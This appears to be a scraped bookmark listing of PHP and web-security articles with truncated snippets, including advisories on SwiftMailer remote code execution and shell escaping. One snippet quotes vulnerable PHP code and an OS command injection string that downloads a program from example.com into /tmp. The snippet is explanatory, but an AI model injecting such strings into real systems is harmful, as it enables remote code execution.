Creating A Cache-aware HTTP/2 Server Push Mechanism | CSS-Tricks
DigitalOcean provides cloud products for every stage of your journey. Get started with $200 in free credit! If you’ve been reading at all about HTTP/2, then you’ve likely heard about server push. If not, here’s the gist of it: Server push lets you preemptively send an asset when the client requests another. To use it, you need an HTTP/2-capable web server, and then you just set a Link header for t
It Turns Out, 2017 is the Year of Simply Secure PHP Cryptography - Paragon Initiative Enterprises Blog
The latest information from the team that develops cryptographically secure PHP software. Is Your Cryptography Reliable? Our team specializes in studying real world cryptography implementations to assure their correctness and security. Why You Want to Hire Our Company Contact Us Six months ago, I wrote a blog post titled Let's Make 2017 the Year of Simply Secure PHP Cryptography, which at the time
Kornel / babel-preset-php · GitLab
Babel preset for converting PHP syntax to JavaScript. It can run subset of PHP in the browser or in Node.js. Expanding Atwood's Law.
Capsule
Capsule Clean, concise, composable dependency injection for PHP 8. Installation Install Capsule via Composer: composer require capsule/di ^4.0 The Github repository is at capsulephp/di. Autowiring Container Capsule will auto-inject typehinted constructor parameters. use Capsule\Di\Container; use Capsule\Di\Definitions; class Foo implements FooInterface { public function __construct( protected Bar
$_GET と $_POST は不適切な名前である - Qiita
$_GET は名前だけでは HTTP GET メッセージをあらわすものとして考えてしまいがちですが、実際には URI クエリパラメーターであり、GET リクエスト以外にも使うことができます。 $_POST はリクエストボディをあらわしますが、Content-Type ヘッダーの値が x-www-form-urlencoded もしくは multipart/form-data であるときにかぎられます。たとえば Content-Type ヘッダーの値が application/json である場合には読み込み専用のストリーム (php://input) を利用する必要があります。 apfd (Always Populate Form Data) エクステンションを導入すれば、HTTP メッセージの Content-Type の値が multipart/form-data もしくは appli
リモートコード実行の脆弱性 (CVE-2016-10074) に対応した SwiftMailer のセキュリティリリース - Qiita
概要 リモートコード実行の脆弱性 (CVE-2016-10074) に対応するために SwiftMailer 5.4.5 がリリースされました。脆弱性の条件に該当するプロジェクトはバージョンアップやアプリケーションの修正が求められます。 該当するプロジェクト sendmail もしくは sendmail と互換性があり、-X オプションが利用可能であるプログラムを使う (postfix は -X を無効にしている) From、Sender、ReturnPath フィールドの値にユーザーからの入力を使う lsmith さんのツイートによれば、Symfony の場合、transport で smtp の代わりに mail を使っているプロジェクトが該当します。 検証コード 脆弱性を説明するドキュメントに記載されているコードは次のようなものです。 // sender フィールドをもつ問い合わせフ
OSコマンドのエスケープ – シェルの仕様とコマンドの実装
(Last Updated On: 2018年8月16日)OSコマンドのエスケープの続きです。OSコマンドインジェクションを防ぐための、OSコマンドのエスケープはSQLのエスケープに比べるとかなり難しいです。 難しくなる理由は多くの不定となる条件に依存する事にあります。 OSコマンドを実行するシェルはシステムによって異なる シェルはプログラミング言語+複雑なエスケープ仕様を持っている(コマンド以後はクオートなしでも文字リテラルのパラメーター+各種展開処理) WebアプリはCGIインターフェースで動作するため環境変数にインジェクションできる コマンドパラメーターの取り扱いはコマンド次第である 実行されるコマンドの実装により、間接インジェクションが可能になる SQLの場合、出力先のシステムは一定です。PostgreSQL用にエスケープした文字列をMySQLで実行したり、MySQL用にエスケープ
OSコマンドのエスケープ
(Last Updated On: 2022年7月25日)プログラムからOSコマンドを実行する場合、エスケープ処理を行わないと任意コマンドが実行される危険性があります。 今回はOSコマンドのエスケープについてです。 OSコマンドインジェクション OSコマンドインジェクションはプログラムから実行するコマンドに、攻撃用文字列を挿入(インジェクション)して意図しないコマンドを実行させる攻撃です。 例えば、次のようなLinuxシステムのディレクトリの内容を表示させるプログラム <?php passthru('ls -l '.$_GET['dir']); (任意のディレクトリ内容を表示できる脆弱性はここでは考慮しない) に不正なコマンドを実行させるのはとても簡単です。$_GET[‘dir’]に . ; cd /tmp; wget http://example.com/evil_program; ch
Security Advisory: PHP's escapeshellcmd and escapeshellarg are insecure
escapeshellrce.md Paul Buonopane paul@namepros.com at NamePros PGP: https://keybase.io/zenexer I'm working on cleaning up this advisory so that it's more informative at a glance. Suggestions are welcome. This advisory addresses the underlying PHP vulnerabilities behind Dawid Golunski's CVE-2016-10033, CVE-2016-10045, and CVE-2016-10074. It assumes prior understanding of these vulnerabilities. This
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
PHP: rfc:argon2_password_hash_enhancements
GitHub - paragonie/paseto: Platform-Agnostic Security Tokens
GitHub - walkor/workerman: An asynchronous event driven PHP socket framework. Supports HTTP, Websocket, SSL and other custom protocols.
GitHub - opentracing/opentracing-php: OpenTracing API for PHP
GitHub - shumkov/grpc-everywhere-php: PHP connector for GRPC everywhere server
GitHub - aidantwoods/SecureHeaders: A PHP library aiming to make the use of browser security features more accessible.
PHP: rfc:allow-abstract-function-override
GitHub - phpv8/php-v8: PHP extension for V8 JavaScript engine
Caddy で HTTP/2 と php-fpm を利用する - Qiita
PHP: rfc:request_response
GitHub - hnw/php-timecop: A PHP extension providing "time travel" capabilities inspired by ruby timecop gem
